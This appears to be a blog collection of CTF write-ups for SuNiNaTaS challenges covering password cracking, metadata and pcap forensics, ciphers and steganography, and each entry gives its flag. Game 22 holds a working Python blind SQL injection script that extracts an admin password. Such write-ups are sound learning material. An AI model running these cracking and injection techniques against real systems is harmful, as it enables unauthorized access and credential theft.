Hello Navi

note and sharing

Posted on Edited on In Disqus: Word count in article: 85 Reading time ≈ 1 mins.

challenges

Game 14

Challenge: Password cracking from Linux shadow file

Tool: John the Ripper

Step 1: Extract Archive

1
tar xf evidence.tar

Step 2: Examine Shadow File

The shadow file contains a hashed password entry:

1
suninatas:$6$QlRlqGhj$BZoS9PuMMRHZZXz1Gde99W01u3kD9nP/zYtl8O2dsshdnwsJT/1lZXsLar8asQZpqTAioiey4rKVpsLm/bqrX/:15427:0:99999:7:::

Step 3: Prepare for Cracking

Combine passwd and shadow files:

1
unshadow passwd shadow > unshadow

Step 4: Crack Password

Use John the Ripper with a wordlist:

1
john unshadow --wordlist=~/ctf/tool/dic/rockyou.txt

Output: 

1
iloveu1         (suninatas)

iloveu1

Posted on Edited on In Disqus: Word count in article: 97 Reading time ≈ 1 mins.

challenges

Game 15

We're given an mp3 file (diary.mp3). The hex dump reveals ID3 tags and an embedded JPEG with Exif data:

1
2
3
4
5
00000000: 4944 3303 0000 0000 6f76 5450 4532 0000  ID3.....ovTPE2..
...
00000080: 0033 f700 0000 696d 6167 652f 6a70 6567  .3....image/jpeg
00000090: 0003 00ff d8ff e000 104a 4649 4600 0101  .........JFIF...
000000a0: 0101 2c01 2c00 00ff e101 8645 7869 6600  ..,.,......Exif.

The flag is in the metadata — exiftool shows it in the Conductor field:

1
2
3
4
❯ exiftool diary.mp3
...
Conductor                       : ********************
...
GoodJobMetaTagSearch

The embedded cover art can be extracted with binwalk:

1
❯ binwalk -e diary.mp3

Posted on Edited on In Disqus: Word count in article: 83 Reading time ≈ 1 mins.

challenges

Game 16

We have a PCAP (Packet Capture) file to analyze:

1
2
3
❯ 7z x packet_dump.zip
❯ file packet_dump.pcap
packet_dump.pcap: pcap capture file, microsecond ts (little-endian) - version 2.4 (Ethernet, capture length 65535)

Extract credentials by searching for password parameters in the captured network traffic:

1
2
3
4
5
6
❯ strings packet_dump.pcap | grep Hpw=
Hid=suninatas&Hpw=suninatasc
Hid=blackkey&Hpw=blackkeyn
Hid=ultrashark&Hpw=sharkpass01~
Hid=ultrashark&Hpw=%3Dsharkpass01
Hid=ultrashark&Hpw=%3DSharkPass01

Try logging in with each credential pair until one succeeds:

1
Congratulation! Authkey : ********************************
WireSharkBetterThanWirelessShark

Posted on Edited on In Disqus: Word count in article: 92 Reading time ≈ 1 mins.

challenges

Game 17

We have a QR code image that needs to be processed and decoded. Start by enhancing the image with ImageMagick:

1
2
❯ convert qr.png -threshold 85% out.png
❯ convert out.png -background black -alpha remove -alpha off oo.png

The processed image may be incomplete or corrupted. Use an image editor like Krita to overlay the three pattern images (position markers) on top of the QR code to restore it.

Once repaired, decode the QR code with zbarimg:

1
❯ zbarimg oo.png

This yields the flag:

1
Good Job! Congraturation! AuthKey is YouAreQRCodeMaster~!
YouAreQRCodeMaster~!

Posted on Edited on In Disqus: Word count in article: 76 Reading time ≈ 1 mins.

challenges

Game 19

We have a large block of binary data. Decode it to get an encrypted message:

1
2
3
4
5
6
7
8
9
10
11
12
0100111001010110010000110101010001000110010001000101
0110001000000100101101000110001000000100101001001100
0100010101011010010001010101001001001011010100100100
1010001000000101001001000101010101010010000001001011
0100011001010101010100100101000000100000010110100100
1010001000000101001000100000010110000100011001000110
0101010100100000010101010101001001010000001000000101
0010010001010101010100100000010100100100110001001011
0101100101000010010101100101000000100000010110100100
1010001000000100011101000011010100100101101001010101
0101010001001011010101110101101001001010010011010101
0110010010010101000001011001010100100100100101010101

Decode as binary to get:

1
NVCTFDV KF JLEZERKRJ REU KFURP ZJ R XFFU URP REU RLKYBVP ZJ GCRZUTKWZJMVIPYRIU

This text is encrypted with an affine cipher. Use an affine decoder to decrypt:

1
WELCOME TO SUNINATAS AND TODAY IS A GOOD DAY AND AUTHKEY IS **********************
PLAIDCTFISVERYHARD

Posted on Edited on In Disqus: Word count in article: 143 Reading time ≈ 1 mins.

challenges

Game 18

We have an array of numbers that represent hex values. Convert them to hex:

1
2
data = [86, 71, 57, 107, 89, 88, 107, 103, 97, 88, 77, 103, 89, 83, 66, 110, 98, 50, 57, 107, 73, 71, 82, 104, 101, 83, 52, 103, 86, 71, 104, 108, 73, 69, 70, 49, 100, 71, 104, 76, 90, 88, 107, 103, 97, 88, 77, 103, 86, 109, 86, 121, 101, 86, 90, 108, 99, 110, 108, 85, 98, 50, 53, 110, 86, 71, 57, 117, 90, 48, 100, 49, 99, 109, 107, 104]
print(''.join(f'{x:02x}' for x in data))

Convert the hex output to binary, then decode as base64:

1
2
3
4
❯ python tmp.py > hex.txt
❯ xxd -r -p hex.txt data.bin
cat data.bin
VG9kYXkgaXMgYSBnb29kIGRheS4gVGhlIEF1dGhLZXkgaXMgVmVyeVZlcnlUb25nVG9uZ0d1cmkh

The string is base64-encoded. Decode it:

1
Today is a good day. The AuthKey is *********************
VeryVeryTongTongGuri!

Posted on Edited on In Disqus: Word count in article: 130 Reading time ≈ 1 mins.

challenges

Game 21

We have a JPEG image to analyze. Check its properties:

1
2
❯ file monitor.jpg
monitor.jpg: JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=11, description=SAMSUNG, ...], baseline, precision 8, 640x480, components 3

Check for embedded data with binwalk:

1
2
❯ binwalk monitor.jpg
Analyzed 1 file for 85 file signatures (187 magic patterns) in 9.0 milliseconds

Attempting to use stegseek reveals a structural issue:

1
2
3
❯ stegseek monitor.jpg
StegSeek 0.6
Invalid JPEG file structure: two SOI markers

The file contains multiple JPEG images (indicated by multiple Start of Image markers). Extract them using foremost:

1
2
3
4
5
6
7
8
9
10
11
12
13
❯ foremost monitor.jpg
❯ tree output/
output/
├── audit.txt
└── jpg
    ├── 00000000.jpg
    ├── 00000383.jpg
    ├── 00000765.jpg
    ├── 00001148.jpg
    ├── 00001532.jpg
    ├── 00001914.jpg
    ├── 00002297.jpg
    └── 00002681.jpg

Examine the extracted images to find the flag.

H4CC3R_IN_TH3_MIDD33_4TT4CK

Posted on Edited on In Disqus: Word count in article: 242 Reading time ≈ 1 mins.

challenges

Game 22

This is a blind SQL injection challenge with heavy filtering. Keywords blocked include: select, union, or, whitespace, by, having, from, char, ascii, left, right, delay, 0x.

The goal is to find the admin's password. Start with credentials guest/guest to obtain a valid session.

Use a Python script to extract the password character-by-character via blind SQL injection:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import requests
import string

url = "http://suninatas.com/challenge/web22/web22.asp"
cookies = {
    "ASP.NET_SessionId": "...",
    "auth_key": "...",
    # ... other session cookies
}

charset = string.ascii_letters + string.digits + "!@#$%^&*()_+"
password = ""

for i in range(1, 31):
    found_char = False
    for char in charset:
        # Test: substring(pw, index, length) = char
        payload = f"'and(substring(pw,{i},1)='{char}')--"
        params = {'id': 'admin' + payload, 'pw': 'a'}

        try:
            r = requests.get(f"{url}?id={params['id']}&pw={params['pw']}", cookies=cookies)
            if "OK" in r.text:
                password += char
                print(f"[+] Found char at index {i}: {char}")
                found_char = True
                break
        except Exception as e:
            print(f"[!] Error: {e}")

    if not found_char:
        break

print(f"[SUCCESS] Final Password: {password}")

Running the script reveals the admin password:

1
2
3
4
5
6
7
8
9
10
11
12
13
[+] Found char at index 1: N
[+] Found char at index 2: 1
[+] Found char at index 3: c
[+] Found char at index 4: 3
[+] Found char at index 5: B
[+] Found char at index 6: i
[+] Found char at index 7: l
[+] Found char at index 8: n
[+] Found char at index 9: l
[+] Found char at index 10: )
[+] Found char at index 11: +
[+] Found char at index 12: +
...
N1c3Bilnl)